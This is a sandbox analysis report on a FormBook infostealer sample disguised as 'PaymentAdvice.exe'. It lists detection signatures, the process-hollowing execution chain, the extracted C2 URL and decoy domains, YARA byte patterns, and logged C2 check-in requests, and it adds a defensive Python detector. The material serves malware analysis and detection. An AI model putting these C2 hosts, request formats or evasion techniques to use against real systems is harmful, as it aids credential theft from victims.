
Analysis Report PaymentAdvice.exe

Overview

General Information

Sample Name: PaymentAdvice.exe
Analysis ID: 383926
MD5: 91937d3f9e93657c18129ff519b7f340
SHA1: d9acfebf2120d984d76bdf883094707305897691
SHA256: 397fd95899f186c1385818c6b996f4cb410e266a84b2c134104d01675a822e27
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PaymentAdvice.exe (PID: 2852 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
    • PaymentAdvice.exe (PID: 5412 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 5964 cmdline: /c del 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
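The tree above is the FormBook execution pattern: the packed loader re-executes itself, the sandbox draws explorer.exe under the second instance (injection into it), explorer.exe is then made to start a 32-bit system binary from C:\Windows\SysWOW64 (msiexec.exe, with no arguments) that is hollowed to host the payload, and that process runs cmd.exe /c del to remove the original file. The report notes that no Sigma rule matched, so the following added example, which is not part of the Joe Sandbox report, encodes two of those tells as detection logic over a constructed process-creation list mirroring the tree. The PIDs, images and command lines come from the tree; the parent of the first PaymentAdvice.exe, the cmd.exe image path, the benign msiexec control event and the HOLLOW_HOSTS set beyond msiexec.exe are assumptions.

```python
import re
from typing import Dict, List, NamedTuple, Tuple


class Proc(NamedTuple):
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events mirroring the report's Startup tree.
# Assumed (not on the page): ppid 1 for the root, the cmd.exe image path,
# and the last, benign msiexec event used as a negative control.
EVENTS: List[Proc] = [
    Proc(2852, 1,    r"C:\Users\user\Desktop\PaymentAdvice.exe", r"C:\Users\user\Desktop\PaymentAdvice.exe"),
    Proc(5412, 2852, r"C:\Users\user\Desktop\PaymentAdvice.exe", r"C:\Users\user\Desktop\PaymentAdvice.exe"),
    Proc(3472, 5412, r"C:\Windows\explorer.exe", ""),
    Proc(5748, 3472, r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\msiexec.exe"),
    Proc(5964, 5748, r"C:\Windows\System32\cmd.exe", r"/c del C:\Users\user\Desktop\PaymentAdvice.exe"),
    Proc(844,  5964, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    Proc(7001, 900,  r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\msiexec.exe /i setup.msi /qn"),
]

# System binaries that FormBook-style loaders hollow after injecting explorer.exe.
# Only msiexec.exe is evidenced on this page; the other names are an assumption.
HOLLOW_HOSTS = {"msiexec.exe", "svchost.exe", "wlanext.exe", "cmstp.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def by_pid(events: List[Proc]) -> Dict[int, Proc]:
    return {p.pid: p for p in events}


def ancestry(events: List[Proc], pid: int) -> List[Proc]:
    """Chain from pid up to the root, child first; stops at an unknown parent or a loop."""
    procs = by_pid(events)
    chain, seen = [], set()
    cur = procs.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = procs.get(cur.ppid)
    return chain


def has_no_arguments(p: Proc) -> bool:
    """True when the command line is nothing but the image path (no switches, no files)."""
    return p.cmdline.strip().strip('"').lower() == p.image.lower()


def detect_hollowed_system_binary(events: List[Proc]) -> List[int]:
    """explorer.exe starting a system binary with an empty argument list: the hollowing host."""
    procs = by_pid(events)
    hits = []
    for p in events:
        parent = procs.get(p.ppid)
        if (basename(p.image) in HOLLOW_HOSTS
                and parent is not None and basename(parent.image) == "explorer.exe"
                and has_no_arguments(p)):
            hits.append(p.pid)
    return hits


# cmd.exe /c del <path.exe>, with or without quotes around the path.
DEL_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+?\.exe)['\"]?\s*$", re.IGNORECASE)


def detect_self_delete(events: List[Proc]) -> List[Tuple[int, str]]:
    """cmd.exe deleting a file that is the image of one of its own ancestors."""
    hits = []
    for p in events:
        if basename(p.image) != "cmd.exe":
            continue
        m = DEL_RE.search(p.cmdline)
        if not m:
            continue
        target = m.group(1).lower()
        if any(a.image.lower() == target for a in ancestry(events, p.pid)[1:]):
            hits.append((p.pid, m.group(1)))
    return hits


def findings(events: List[Proc]) -> List[str]:
    out = []
    for pid in detect_hollowed_system_binary(events):
        chain = " <- ".join(basename(a.image) for a in ancestry(events, pid))
        out.append(f"hollowed system binary pid={pid}: {chain}")
    for pid, path in detect_self_delete(events):
        out.append(f"self-deletion of {path} by cmd.exe pid={pid}")
    return out


if __name__ == "__main__":
    for line in findings(EVENTS):
        print(line)
```

The self-deletion check deliberately compares the deleted path against the ancestors' images rather than matching any `del *.exe`, so installers cleaning up their own temporary files under a different parent do not fire; the msiexec check keys on the empty argument list, which is how the hollowed copy differs from a real MSI install.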

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.saturnkorp.net/c22b/"], "decoy": ["westendjanakpuri.com", "sylvianicolades.com", "xhvai.com", "vitalinfusionofarizona.com", "orangeecho.com", "middletonyork.net", "nature-powered.com", "securemanchester.com", "hispanicalinguablog.com", "vtz6whu5254xb1.xyz", "forceshutdown.com", "apointlessspace.net", "wildsoulsport.com", "baa-bee.com", "unmanglement.com", "njtiy.com", "misery-indexrain.com", "buybox.guru", "abolishlawinforcement.com", "healthforherraleigh.clinic", "merakart.com", "thetrentproject.com", "tobaccoroadinvitational.com", "sgdivergence.com", "skmoil.com", "bornforbetterthings.com", "tianyulian.com", "pwjol.com", "roab.store", "thebellabloom.com", "innerpeacehabits.com", "curtex.info", "worshipher.net", "puebloregentseniorliving.com", "profoundai.net", "yupinduoge.com", "draftsofsilence.com", "plataformaporelmarcanario.com", "grandrapidshemorrhoidclinic.com", "crossfut.net", "cobourgautoglass.com", "whowetrust.com", "anchor-little.com", "antiqollection.com", "wvregistration.com", "droplites.com", "creditiscrucial.com", "simdikikitap.com", "deltaeleveight.com", "webinast.com", "brandschutzglas.com", "brightsidebeans.com", "weatherdekniagara.com", "dajiangzhibo12.com", "transporteyflete.com", "dulzdude.com", "tmancar.com", "tristatecandlesupply.net", "thehealthierdonut.com", "francacheladesigns.com", "enerav.com", "highsiddityminks.com", "aitelco.net", "prulib.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PaymentAdvice.exe.2680000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PaymentAdvice.exe.2680000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PaymentAdvice.exe.2680000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
2.2.PaymentAdvice.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.PaymentAdvice.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m | Avira URL Cloud: Label: malware
Source: http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m | Avira URL Cloud: Label: malware
Source: www.saturnkorp.net/c22b/ | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy list as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: PaymentAdvice.exe | Virustotal: Detection: 32%
Source: PaymentAdvice.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PaymentAdvice.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.PaymentAdvice.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.msiexec.exe.95a558.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.msiexec.exe.4b47960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.PaymentAdvice.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.PaymentAdvice.exe.2680000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: PaymentAdvice.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: msiexec.pdb | source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
Source: Binary string: msiexec.pdbGCTL | source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
Source: Binary string: C:\xampp\htdocs\Cryptor\78a9904c70914141b6b07ca4fbdcf1ff\Loader\Loader\Release\u58v4wo87.pdb | source: PaymentAdvice.exe, 00000000.00000002.238262176.0000000073CA2000.00000002.00020000.sdmp, ic4muy4.dll.0.dr
Source: Binary string: wntdll.pdbUGP | source: PaymentAdvice.exe, 00000000.00000003.229993167.000000001F100000.00000004.00000001.sdmp, PaymentAdvice.exe, 00000002.00000002.278191881.00000000009D0000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.502133269.0000000004610000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: PaymentAdvice.exe, msiexec.exe
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_004026BC FindFirstFileA
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop ebx | 2_2_00406A95
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi | 2_2_0040C3CF
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi | 2_2_0040C390
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi | 2_2_00415681
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop ebx | 2_1_00406A95
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi | 2_1_0040C3CF
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi | 2_1_0040C390
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop ebx | 7_2_00386A95
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi | 7_2_0038C390
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi | 7_2_0038C3CF
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi | 7_2_00395681

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.saturnkorp.net/c22b/
Performs DNS queries to domains with low reputation
Source: DNS query: www.vtz6whu5254xb1.xyz
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.abolishlawinforcement.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.webinast.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.puebloregentseniorliving.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.brandschutzglas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.hispanicalinguablog.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.unmanglement.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.plataformaporelmarcanario.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.dajiangzhibo12.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.saturnkorp.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1 | Host: www.sgdivergence.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 199.59.242.153
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: Joe Sandbox View | ASN Name: GOOGLE-2US
Source: Joe Sandbox View | ASN Name: WORLD4YOUAT
Source: C:\Windows\explorer.exe | Code function: 3_2_070A7302 getaddrinfo,setsockopt,recv
Source: unknown | DNS traffic detected: queries for: www.abolishlawinforcement.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
